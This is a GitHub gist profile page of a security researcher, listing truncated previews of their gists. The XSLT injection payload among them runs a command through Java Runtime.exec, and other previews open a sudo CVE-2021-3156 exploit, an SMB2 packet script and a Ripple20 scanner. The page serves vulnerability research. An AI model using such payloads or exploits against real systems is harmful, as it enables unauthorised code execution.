🤣
Read the fucking source code

swing WinMin

🤣
Read the fucking source code
View GitHub Profile
@WinMin
WinMin / xz-backdoor.md
Created March 31, 2024 07:27 — forked from thesamesam/xz-backdoor.md
xz-utils backdoor situation

FAQ on the xz-utils backdoor

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for

WinMin / fgt_7.4.x_rootfs_decrypt.py
Created March 18, 2024 07:23 — forked from rrrrrrri/fgt_7.4.x_rootfs_decrypt.py
fgt_7.4.x_rootfs_decrypt
import magic
import r2pipe
import hashlib
import argparse
import subprocess
from unicorn import *
from unicorn.x86_const import *
# from udbserver import * # uncomment this line if you want to debug
def pad_size(size):
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
WinMin / msl.py
Last active June 5, 2022 13:32
MacOS subsystem Linux (powered by docker)
#!/usr/bin/env python3
import docker
import os
import platform
import logging
import argparse
from distutils.dir_util import mkpath
WinMin / theme.css
Created March 4, 2022 06:01 — forked from fatalbit/theme.css
IDA Monokai Color Palette
/* INSTALL:
*
* Put this file under the respective directory.
* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
* Linux & MacOS: ~/.idapro/themes/monokai/theme.css
*
* In Options -> Colors change theme to monokai
*
* */
@importtheme "dark";
WinMin / CVE-2021-3156-exploit.c
Last active August 9, 2021 02:44
CVE-2021-3156-exploit
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/*
author: swing @ bestswngs@gmail.com
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
WinMin / show_protocol.py
Created July 22, 2020 06:00
show protocol in gdb debug
from scapy.all import *
from scapy.layers.http import *
import gdb
class ShowProcto(gdb.Command):
"""
Usage: xpr/size memaddr procto_type
Example:
(gdb) xpr/20 0x7fffffffe238 TCP
WinMin / ripple20-treck-scan.py
Created July 2, 2020 05:24
ripple20-treck-scan.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#author:swing
from scapy.all import *
ICMP_MS_SYNC_REQ_TYPE = 0xa5
ICMP_MS_SYNC_RSP_TYPE = 0xa6
def keep_icmp_handler(func):
# author: @leommxj @swing
import socket, struct, sys, time
from functools import reduce
class Smb2Header:
def __init__(self, command, message_id):
self.protocol_id = "\xfeSMB"
self.structure_size = "\x40\x00" # Must be set to 0x40
self.credit_charge = "\x00"*2
WinMin / wslport.ps1
Created June 23, 2020 05:55
wsl2 open port
param($port, $op='open', $protocol='tcp')
#Remove Firewall Exception Rules
Function removeFirewall(){
Invoke-Expression "Remove-NetFireWallRule -DisplayName 'WSL 2 Firewall Unlock *' ";
Invoke-Expression "netsh interface portproxy reset";
}